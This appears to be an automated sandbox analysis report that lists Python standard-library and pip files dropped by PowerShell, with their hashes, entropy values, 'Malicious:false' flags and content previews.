                              SSDEEP:6:INgUrW8U7FqMz/ZWJaM+zowdXLXzLW8igBCW7AYLtR6AoiDo18geK76Uy:Irmqs1zH5jnsi1EQDoPyp
                              MD5:DD120D1EED86DDF996C749E9B17C696E
                              SHA1:B640B9CAFEB9917AE67BA0EFE64FF6052A1C19A7
                              SHA-256:EC15151F532D7E2E4740F0A9618481F3B37828C1180A9A86B7AE450117D67B51
                              SHA-512:D6A49D1AF4B9119703715D5AC62F2417BE9FBDFCDB371B4A1C03F2A6194E80D1DF13739921EB1F1DDB41839510533F4CB737406197E2F6BCFFFC9ACCB1AEA30E
                              Malicious:false
                              Preview:"""..Compatibility shim for .resources.simple as found on Python 3.10.....Consumers that can rely on Python 3.11 should use the other..module directly..."""....from .resources.simple import (.. SimpleReader, ResourceHandle, ResourceContainer, TraversableReader,..)....__all__ = [.. 'SimpleReader', 'ResourceHandle', 'ResourceContainer', 'TraversableReader',..]..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11108
                              Entropy (8bit):4.467337199704047
                              Encrypted:false
                              SSDEEP:192:ukRi99RbmAGewxmDwzxeaCs6KfYs+Fbve2+c6uNUS7GE7GHXonMbwq:uWi9DbmAGecmDwteQTft+9ee6uNUSdNc
                              MD5:C3553B6F4BBCC833370B063D7E485994
                              SHA1:B0FAB8A00A803AD7719215BDA1725A4100A17480
                              SHA-256:D54717B02265B8807EC4241864A5008CF1F07FE44ED525B0A7E4830BDCB0177E
                              SHA-512:91F02BD0EA770610ABD8A39B9C8E74B843896788122D5BF3C67D27EAAE785D0BE5E11D336303D4A4B8252C8B9B5AEFCB7E2D8B2500BC93BCB0790B89D8237C5C
                              Malicious:false
                              Preview:"""Utility code for constructing importers, etc."""..from ._abc import Loader..from ._bootstrap import module_from_spec..from ._bootstrap import _resolve_name..from ._bootstrap import spec_from_loader..from ._bootstrap import _find_spec..from ._bootstrap_external import MAGIC_NUMBER..from ._bootstrap_external import _RAW_MAGIC_NUMBER..from ._bootstrap_external import cache_from_source..from ._bootstrap_external import decode_source..from ._bootstrap_external import source_from_cache..from ._bootstrap_external import spec_from_file_location....import _imp..import sys..import threading..import types......def source_hash(source_bytes):.. "Return the hash of *source_bytes* as used in hash-based pyc files.".. return _imp.source_hash(_RAW_MAGIC_NUMBER, source_bytes)......def resolve_name(name, package):.. """Resolve a relative module name to an absolute one.""".. if not name.startswith('.'):.. return name.. elif not package:.. raise ImportError(f'no package speci
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):128815
                              Entropy (8bit):4.5450804886005605
                              Encrypted:false
                              SSDEEP:3072:Ysbp3kW3MOJ48WwycCMn+8R/E8iEcLBb5xaTqSsGjQdO69MR:/d3kW3Z48BycC6+i/3izb5EqpGjuOQMR
                              MD5:4BF5163B840E062F42EED37E74E6D907
                              SHA1:22722AE70EC807409A5FE7E9C55740E666035970
                              SHA-256:2E53238C7F60ABF930DFBFD16C5969AFD0EDE52B74BF5ED74E87B2B12EA141C1
                              SHA-512:2B96C12C7E72512A02C4854067D07955304BBBBE9C579A425280A0AEBEDE9B65DBF3F86D3BABC0B6B03124570F96C606AF1EAEC861A5371E40A1E34C1A54C7BE
                              Malicious:false
                              Preview:"""Get useful information from live Python objects.....This module encapsulates the interface provided by the internal special..attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion...It also provides some help for examining source code and class layout.....Here are some of the useful functions provided by this module:.... ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),.. isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),.. isroutine() - check object types.. getmembers() - get members of an object that satisfy a given condition.... getfile(), getsourcefile(), getsource() - find an object's source code.. getdoc(), getcomments() - get documentation on an object.. getmodule() - determine the module that an object came from.. getclasstree() - arrange classes so as to represent their hierarchy.... getargvalues(), getcallargs() - get info about function arguments.. getfullargspec() - same, with support for Pytho
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3681
                              Entropy (8bit):4.9444373184330574
                              Encrypted:false
                              SSDEEP:96:pKFiCaQLDyrpVfnmlaypyc4RQmvItakagjUgXgBagO:dCJDo/U9ycObojXQB9O
                              MD5:AE864C768E16CE88666AFD08CD41A2FE
                              SHA1:A33FB950B99FBAE349A29B476A7EF4FA7F2126E0
                              SHA-256:D70646D9C063DD0AC4293591639DE75A100731D9F091F916FBCA4857CD8A044E
                              SHA-512:A445ED5D76E0C8D1CD9EC8886CFDE873553C2A65BE164A9AA0B0340E78A0606819C841DE777A0654D4B96884E014FB8594129525AE7C0B5E7E1D1C2340B787D4
                              Malicious:false
                              Preview:"""The io module provides the Python interfaces to stream handling. The..builtin open function is defined in this module.....At the top of the I/O hierarchy is the abstract base class IOBase. It..defines the basic interface to a stream. Note, however, that there is no..separation between reading and writing to streams; implementations are..allowed to raise an OSError if they do not support a given operation.....Extending IOBase is RawIOBase which deals simply with the reading and..writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide..an interface to OS files.....BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its..subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer..streams that are readable, writable, and both respectively...BufferedRandom provides a buffered interface to random access..streams. BytesIO is a simple stream of in-memory bytes.....Another IOBase subclass, TextIOBase, deals with the encoding and decoding..of stre
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):77311
                              Entropy (8bit):4.543781477920564
                              Encrypted:false
                              SSDEEP:384:gMOEpzoz5zCcf6ZQ8kSEtw1M1DGhkaCU7m7F7nKEwXN60wGUrnPpNBsB/FfhUQ3/:D3k92cfn8rB/3UrP2tF1zkm4uJPNjZT
                              MD5:19019D4E4BBEE2096C35140714348B57
                              SHA1:2AF2A0F877D9AA6FE8CDEF463716A21B6E088460
                              SHA-256:4179279BF3A9711CC7A9C0E0679366113BAED44428807BE5A8F2C81B271F19B3
                              SHA-512:2B2823EA8956F5154C4FC94166EB0C0A8A3E80C5102FE275907471D3104CFFF9430F08A4355E68E9CE0C54227595207E042639C6D61C65111ACEDB6A16656E1D
                              Malicious:false
                              Preview:# Copyright 2007 Google Inc...# Licensed to PSF under a Contributor Agreement....."""A fast, lightweight IPv4/IPv6 manipulation library in Python.....This library is used to create/poke/manipulate IPv4 and IPv6 addresses..and networks....."""....__version__ = '1.0'......import functools....IPV4LENGTH = 32..IPV6LENGTH = 128......class AddressValueError(ValueError):.. """A Value Error related to the address."""......class NetmaskValueError(ValueError):.. """A Value Error related to the netmask."""......def ip_address(address):.. """Take an IP string/int and return an object of the correct type..... Args:.. address: A string or integer, the IP address. Either IPv4 or.. IPv6 addresses may be supplied; integers less than 2**32 will.. be considered to be IPv4 by default..... Returns:.. An IPv4Address or IPv6Address object..... Raises:.. ValueError: if the *address* passed isn't either a v4 or a v6.. address.... """.. t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):14379
                              Entropy (8bit):4.879440125735685
                              Encrypted:false
                              SSDEEP:192:yi/B/vYM/qFHkKzxUrZGabjtH0kSzxUrZGabuZbN92JDRCRtqUmnXRCRtqWAi2K5:yOIzxGwzxFxnWECxECdA
                              MD5:DB4A220A79A5F826EF36359ED1C50C28
                              SHA1:1774DC6339A61957AA38AB6A6A25AB6A0B1D9DE4
                              SHA-256:FEB17670E443E5DB2723F217727DCC5D5E155C40E4E6935B16061C88542F24E7
                              SHA-512:3A51E599669D4AFC7339EF06C7A3C9889718EE525F019F044672F2A1C7DE6BF98F581AF54B138D0573D2CC9CF660DDBDF81DB9C4516A125F49BE4A147F2F09B6
                              Malicious:false
                              Preview:r"""JSON (JavaScript Object Notation) <https://json.org> is a subset of..JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data..interchange format.....:mod:`json` exposes an API familiar to users of the standard library..:mod:`marshal` and :mod:`pickle` modules. It is derived from a..version of the externally maintained simplejson library.....Encoding basic Python object hierarchies::.... >>> import json.. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]).. '["foo", {"bar": ["baz", null, 1.0, 2]}]'.. >>> print(json.dumps("\"foo\bar")).. "\"foo\bar".. >>> print(json.dumps('\u1234')).. "\u1234".. >>> print(json.dumps('\\')).. "\\".. >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).. {"a": 0, "b": 0, "c": 0}.. >>> from io import StringIO.. >>> io = StringIO().. >>> json.dump(['streaming API'], io).. >>> io.getvalue().. '["streaming API"]'....Compact encoding::.... >>> import json.. >>> mydict = {'4':
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13659
                              Entropy (8bit):5.582584498279117
                              Encrypted:false
                              SSDEEP:384:vM0TNAHo6vx/YvM3vx8ZvWzZrk3Zr/WAA:U0pAHfvx/YvWvx8ZvWZrk3Zr/WAA
                              MD5:78BA0BA33865A1627B8BCAAA25ED1AA0
                              SHA1:2E68D25261B2F03F417375E6DD67A8C8CA150557
                              SHA-256:FF92E03029093303BFFEA725612F1D07959A74A048E0B33AA6BAD468B2162843
                              SHA-512:BACE53E2561D50D24DDFE0557507B1A5F07EE46DB95F57AD0827C04D07B575C544B46566AC19DE7C91384F290D0E06BEE42D0CD09D17867E06744AB374EA8D01
                              Malicious:false
                              Preview:.........U.f+8..............................d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z...e.d.d.d.d.d.d.d...........Z.d.d.d.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d.d.d.d...d...Z...e.d.d...........Z.d...Z.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d...d...Z.y.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13864
                              Entropy (8bit):5.744352903898608
                              Encrypted:false
                              SSDEEP:192:POyvB6kdGEZLu6A94DMUu5v7vLobKWjFZ3iIgXgw4F8mbANHFThJt7AeIM+JSlRJ:2Vk0Mi6A94DMUu5v7vPokR28muInJ8RJ
                              MD5:59304DA7C224BA5424BC13B03B9A47FD
                              SHA1:7F542BBAFFF66723485C9E2B7523A4C9EC0BCA73
                              SHA-256:0F216B180EA8CC41A9EA324A0FDF5D4A5253D02DD61D7F5AB9D6F955DAFCC17B
                              SHA-512:C0BCFE014556A927602D27C55A4BFBFF607FD225BF94ED46F4A0377A6AED0985D87252827F25F81C7697F840E0685E8A4F604AB9199CC8CD9B95BCCBF9ABBCE9
                              Malicious:false
                              Preview:.........U.f.2..............................d.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.m.Z...d.d.g.Z.e.j...................e.j...................z...e.j...................z...Z...e.d.........Z...e.d.........Z...e.d.........Z...G.d...d.e.........Z.e.e.e.d...Z...e.j(..................d.e.........Z.d.d.d.d.d.d.d.d.d...Z.d...Z.d.e.e.j0..................f.d...Z.e.x.s...e.Z...e.j(..................d.e.........Z.d.Z.d.e.j0..................e.f.d...Z.e.j0..................e.f.d...Z...G.d...d.e.........Z.y.#.e.$.r...d.Z.Y...w.x.Y.w.).z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc...........................e.Z.d.Z.d.Z.d...Z.d...Z.y.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):15137
                              Entropy (8bit):5.805452410651969
                              Encrypted:false
                              SSDEEP:192:gZ3up4Kkgf4MszI6lxnP14EZN7/JG2NQHbqzY4vyyK5wEnLZ6rtbvvs:T4XMUnd4EZG2q2uHKELZ6xjs
                              MD5:6460EB1EF06BC83CEAE802345DB2CB10
                              SHA1:11AED0D9E885DBEA78787DFDAC0E3CC58859BF46
                              SHA-256:F8700E1F14A861F9EF5A972A3BE59E2A75AF6CC86B9FA3540296728586B2BA72
                              SHA-512:3893B7289A94676E49B651DBB6B8BE9C76459D29F46CFCA9BFDD7C4EE954946B60775446EDD3DDC545D30B2622E1DF96B66AF68CCE4144992E2BC580F295D352
                              Malicious:false
                              Preview:.........U.f.@..............................d.Z.d.d.l.Z...d.d.l.m.Z.....d.d.l.m.Z.....d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.d.d.d.d.d.d.d.d...Z...e.d.........D.])..Z.e.j#....................e.e.........d.j'..................e....................+..[...e.d.........Z.d...Z.e.x.s...e.Z.d...Z.e.x.s...e.Z...G.d...d.e.........Z.e.e.e.e.e.e.e.e e!e.jD..................f.d...Z#y.#.e.$.r...d.Z.Y...w.x.Y.w.#.e.$.r...d.Z.Y...w.x.Y.w.#.e.$.r...d.Z.Y...w.x.Y.w.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc.....................@.....d...}.d.t.........j...................|.|.........z...d.z...S.).z5Return a JSON representation of a Python string.. c.....................2.....t.........|.j...................d.............S.).Nr....)...ES
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4236
                              Entropy (8bit):5.236876211740066
                              Encrypted:false
                              SSDEEP:48:vDaQLfBUJseVokjAztPxZXV9eahDswPsxhWtMM4/nG3njANsR+YCFwEnP6WYmvU7:NZ0okqtZL9ywUxctMo3cNw+n7P6WYmWp
                              MD5:9B07BCAEE1DF3377D66BCA3225BE650B
                              SHA1:3C56DE4C9F0C7F5302AC8546CACFA73F9F904E8E
                              SHA-256:E4DE6840752EA3C369A7857C0EB70058D4443C22153A24E579D217EBD2D31A67
                              SHA-512:80C0A02246B2290EB7C1217218CFA5A43D2A7676CAAFF88A92CC38790A9510B0ED3ED0BB52C4E53DBB36E79171768B6218047E8900E569DED4353B702E13092B
                              Malicious:false
                              Preview:........=.Cf..........................D.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...FrozenSet..Optional..Set)...canonicalize_name)...CommandErrorc..........................e.Z.d.Z.d.Z.d.d.g.Z.....d.d.e.e.e.........d.e.e.e.........d.d.f.d...Z.d.e.d.e.f.d...Z.d.e.f.d...Z.e.d.e.d.e.e.....d.e.e.....d.d.f.d...........Z.d.e.d.e.e.....f.d...Z.d.d...Z.y.)...FormatControlzBHelper for managing formats from which a package can be installed...no_binary..only_binaryN..returnc.....................P.....|...t.................}.|...t.................}.|.|._.........|.|._.........y...N)...setr....r....)...selfr....r....s.... .oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/format_control.py..__init__z.FormatControl.__init__....s-...................I..........%.K.."......&............otherc..............................t.............j...........................s.t.........S...j.....................j..................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1703
                              Entropy (8bit):5.169658131497046
                              Encrypted:false
                              SSDEEP:48:c+7U1jaofQjeJESh886x8wA0q7o5BZYj8V4:c6uakQjGDH6x8whP58v
                              MD5:0DF954029D9A43EEE3BDA9E44CF26834
                              SHA1:4A1970362FE9D71EF13CC39D336B0AF230929AAB
                              SHA-256:60D6E310147E6869012097AA014F2CE5D9C6B17CFB764EE5893BD2382A4D7811
                              SHA-512:786E01F20A949313B09DFE385E888BEC26258FEBAA375E2FFA9C39764952D3E78E941BFB94E9505E42A8BAD01C3C93D1C3D1599596E456F57173507B04E7A775
                              Malicious:false
                              Preview:........=.Cf..........................H.....d.d.l.Z...G.d...d.........Z...e.d.d...........Z...e.d.d...........Z.y.)......Nc.....................H.......e.Z.d.Z.d.Z.g.d...Z.d.e.d.e.d.d.f...f.d...Z.d.e.d.e.f.d...Z...x.Z.S.)...PackageIndexzBRepresents a Package Index and provides easier access to endpoints)...url..netloc..simple_url..pypi_url..file_storage_domainr....r......returnNc.............................t...........|...............|.|._.........t.........j...................j...................|.........j...................|._.........|.j...................d.........|._.........|.j...................d.........|._.........|.|._.........y.).N..simple..pypi)...super..__init__r......urllib..parse..urlsplitr......_url_for_pathr....r....r....)...selfr....r......__class__s.... ..fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/index.pyr....z.PackageIndex.__init__....s_............................l.l..+..+.C..0..7..7.........,..,.X..6........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2281
                              Entropy (8bit):5.2300467938263
                              Encrypted:false
                              SSDEEP:48:fY/mKpX9e6Y0RU1vEmFqLaGPpvhzRwLIWQGSKHOT8Dd43Zz7gsS:GDU1vKaMh1wEWQGshE
                              MD5:EDD53D91AF14B33F8C020AA43014A96E
                              SHA1:69399F71DC29D02C2EA236941E20F5000BC58A8F
                              SHA-256:9E6C43DA02CD6BC5BA04CAA0D4CBB83CF76FD512E4173331D05BABB358871924
                              SHA-512:49C2B7E81195A90E3CE2B483D182C935E1FF681EA32C6740D413AFFCDB7808D61B67549AD1E2880283742CB0E423B9520B835DBAE208F10083DF9EBF564C9214
                              Malicious:false
                              Preview:........=.Cf..........................P.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...Any..Dict..Sequence)...default_environment)...__version__)...InstallRequirementc.....................X.....e.Z.d.Z.d.e.e.....f.d...Z.e.d.e.d.e.e.e.f.....f.d...........Z.d.e.e.e.f.....f.d...Z.y.)...InstallationReport..install_requirementsc...........................|.|._.........y.).N)..._install_requirements)...selfr....s.... .tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/installation_report.py..__init__z.InstallationReport.__init__....s.......%9....".......ireq..returnc.....................n.....|.j...................s.J.d.|...............|.j...................j...........................|.j...................|.j...................r.|.j...................j...................n.d.|.j...................|.j...........................j...................d...}.|.j...................r$|.j...................r.t..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):26011
                              Entropy (8bit):5.335452189211323
                              Encrypted:false
                              SSDEEP:384:PNqtIOjbxGjlTN2yEARn3AXb74U10iXyZi617+mRVH4aIZT3QtL8CmVC3:mIUbkjJVEARnQXbEU10l15ROaIZzQtIA
                              MD5:1E6EA8F62C763BE9396A2118B6BD3AB3
                              SHA1:AF330170FCBAA5D8064CDB1394728C2D3BA22CD6
                              SHA-256:CF62EFD5F9E9B392D13CBA28D28DE66383F26AE6DA0071C6D383066A3876BABF
                              SHA-512:3BDEC65823DCE4852DF7CBC3D4F62340340F21DC25FFB9E2C56B9ED005AAE989C23CC8977EA41D01A9CA930C40F69E9C55E3DDB054674A156A837AD315AA6D6F
                              Malicious:false
                              Preview:........=.Cf)Q.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..e.r.d.d.l$m%Z%....e.jL..................e'........Z(d.Z)..e.d.............G.d...d.................Z*..e.d.............G.d...d.................Z+d.e.e.e,e,f.........d.e.e.e,e,f.........f.d...Z-d.e,d.e,f.d...Z.d.e,d.e,f.d...Z/..e.j`..................d.e.jb..........................Z2d.e,d.e3d.e,f.d...Z4d.e,d.e,f.d...Z5..G.d...d.e ........Z6..G.d ..d!e.........Z7d"e6d.e7f.d#..Z8..e.jr..................d..$........d%e6d&e6d.e3f.d'..........Z:y.)(.....N)...dataclass)...TYPE_CHECKING..Any..Dict..List..Mapping..NamedTuple..Optional..Tuple..Union)...deprecated)...WHEEL_EXTENSION)...Hashes)...pairwise..redact_auth_from_url..split_auth_from_netloc..splitext)...KeyBasedCompareMixin)...path_to_url..url_to_path)...IndexContent)...sha512..sha384..sha256..sha22
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1178
                              Entropy (8bit):5.3768547140761225
                              Encrypted:false
                              SSDEEP:24:BCmaThRLwHUp/tlt2FCry16xOpm6Oh+3t/iRBmRRD/hoKhklRT:AmAhRLw0p/tQCWm96A+1iRiRbhrsT
                              MD5:BE0857C1AFB26440BCA8B8CECFA04F01
                              SHA1:353A3AE9B80AD0C4CDCF008607B71ACA5F3A4EDC
                              SHA-256:2C0DAC614247449D474B1E58848B80CF87CE2BA918A45811D1697A4B042060C9
                              SHA-512:B32DE6F1CF0545EE17D7250A25EC7AF51756457CD9C95F5BB39EEA8308A2130124D9646B1D305004E3052CE74BFEFACAA3FC2839A90B90ED148483FA5CAF9A16
                              Malicious:false
                              Preview:........=.Cf..........................$.....d.Z.g.d...Z...G.d...d.........Z.y.).z..For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation......platlib..purelib..headers..scripts..datac.....................4.....e.Z.d.Z.d.Z.e.Z.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.)...SchemeztA Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. r....r....r....r....r......returnNc.....................J.....|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y.).Nr....)...selfr....r....r....r....r....s.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/models/scheme.py..__init__z.Scheme.__init__....s'...............................................)...__name__..__module__..__qualname__..__doc__..SCHEME_KEYS..__slots__..strr......r....r....r....r........sM..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5097
                              Entropy (8bit):5.314363125411477
                              Encrypted:false
                              SSDEEP:96:UkVEGeVpjT8SQ3ZgilOrmc1rfQyXsPlN24lUz:XVE3TT8jSVrmsrfQFNdUz
                              MD5:E29CD315381A52134757E792B1BC2EC1
                              SHA1:4CA5DF09510545FBA221E4DE9536BEF01907E77B
                              SHA-256:BC68A8F1D19954D695B95735FA72E8686A9BF7B837BFD90455FD04398B4A34E9
                              SHA-512:D9E7B730FCB6E83B74AFEC7F6C791C92CBA37887B10139ACB9033C0AFDC4A6818D9DE99A3F7DC2ABA2C09BC664F9FC51A8E97F587B905E2AA6E8F88E18134B86
                              Malicious:false
                              Preview:........=.Cf#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j"..................e.........Z...G.d...d.........Z.y.)......N)...List)...canonicalize_name)...PyPI)...has_tls)...normalize_path..redact_auth_from_urlc..........................e.Z.d.Z.d.Z.g.d...Z.e.d.e.e.....d.e.e.....d.e.d.d.f.d...........Z.d.e.e.....d.e.e.....d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.)...SearchScopezF. Encapsulates the locations that pip is configured to search.. ....find_links..index_urls..no_indexr....r....r......returnc..........................g.}.|.D.]P..}.|.j...................d.........r,t.........|.........}.t.........j...................j...................|.........r.|.}.|.j...................|............R..t.................s`t.........j...................|.|.........D.]G..}.t.........j...................j...................|.........}.|.j...................d.k(..s..2t.........j.........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1860
                              Entropy (8bit):5.377696832790375
                              Encrypted:false
                              SSDEEP:24:vRybOqWwftwOBQ8GYLJ/QoRI8abkJ4eMQKuIgrGIpshf/PgS08xE39Lh0QRELfU1:vPitTu43ekdze/DzetF0iAfFuiS/Vi0
                              MD5:62C9A4879376BD895FAF6D4EFBE19CF0
                              SHA1:567E3A0F3A6C831C9B1A19EAE1F3489143444341
                              SHA-256:A1D0D441DA8CF475A9B254061B439A60513E508CB1CB62350C62502AC3F190DB
                              SHA-512:48764CA2EE4574CC3D74779C836D4CC222B75B57C5D6D4C2B2864394A59ED915F2D3238E6461CDC84BD769F31695FD7B1F9CFB1EF9E60F48A62D99064BC91F66
                              Malicious:false
                              Preview:........=.Cfs.........................0.....d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...Optional)...FormatControlc.....................N.....e.Z.d.Z.d.Z.g.d...Z.........d.d.e.d.e.d.e.e.....d.e.d.e.e.....d.d.f.d...Z.y.)...SelectionPreferenceszd. Encapsulates the candidate selection preferences for downloading. and installing files.. ....allow_yanked..allow_all_prereleases..format_control..prefer_binary..ignore_requires_pythonNr....r....r....r....r......returnc.....................R.....|...d.}.|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y.).aw...Create a SelectionPreferences object... :param allow_yanked: Whether files marked as yanked (in the sense. of PEP 592) are permitted to be candidates for install.. :param format_control: A FormatControl object or None. Used to control. the selection of source packages / binary packages when consulting. the index and links.. :param prefer_binary:
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4963
                              Entropy (8bit):5.388272854250035
                              Encrypted:false
                              SSDEEP:96:Z3AIuKf+/statQpclT9qNcibB07BCjYf9KecqNna:ZQIP+6l23q6it0kYfDna
                              MD5:6B9CF12C1EA3000CC34D8C1A22C568EE
                              SHA1:CDEB4B37483DA489301EAE56DFF5A4BA2CB09F62
                              SHA-256:651E02097C809ADC49E6447B5BA53BE52D611923174E3C0F0D3C2AFA5CFFA12F
                              SHA-512:AC37EE37542EAB7E6FE701351AC51EDAF1E156EDCB2273A4892E8A5F306BB7004B1C1C5F57E39C9F1F59514938ECC6A7E9BBBC0CA4BCBF8A65FD44178D9A75D1
                              Malicious:false
                              Preview:........=.Cf..........................`.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......N)...List..Optional..Set..Tuple)...Tag)...get_supported..version_info_to_nodot)...normalize_version_infoc..........................e.Z.d.Z.d.Z.g.d...Z.........d.d.e.e.e.........d.e.e.e.d.f.........d.e.e.e.........d.e.e.....d.d.f.d...Z.d.e.f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.y.)...TargetPythonzx. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. )..._given_py_version_info..abis..implementation..platforms..py_version..py_version_info.._valid_tags.._valid_tags_setNr....r.....r....r......returnc...........................|.|._.........|...t.........j...................d.d...}.n.t.........|.........}.d.j...................t.........t.........|.d.d...................}.|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........d.|._.........d.|._.........y.).a<...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5789
                              Entropy (8bit):5.458645664336396
                              Encrypted:false
                              SSDEEP:96:pH5zh3vUmKGhFT+p8NTyjK/GNLbcUGTm541Sp:pb3vULc8pEyjK/GRchT5O
                              MD5:236E286A89C89A41A689A4FD3E12B19B
                              SHA1:6449A9C422CBA5145E3524865C28F53A12070C49
                              SHA-256:E3DAA86F0E333F960ACEB25E7035FE09B21F7563C3C5FD09D0CF93EA281BBFFA
                              SHA-512:CC005ABD06EC6BB51E6604883C5D83F9468319A08C0653F1F010790FCD83C4866F9B861A2FFB78240719DEDA684EF9991C7BA92183D25B613C1CABB3A52A3F60
                              Malicious:false
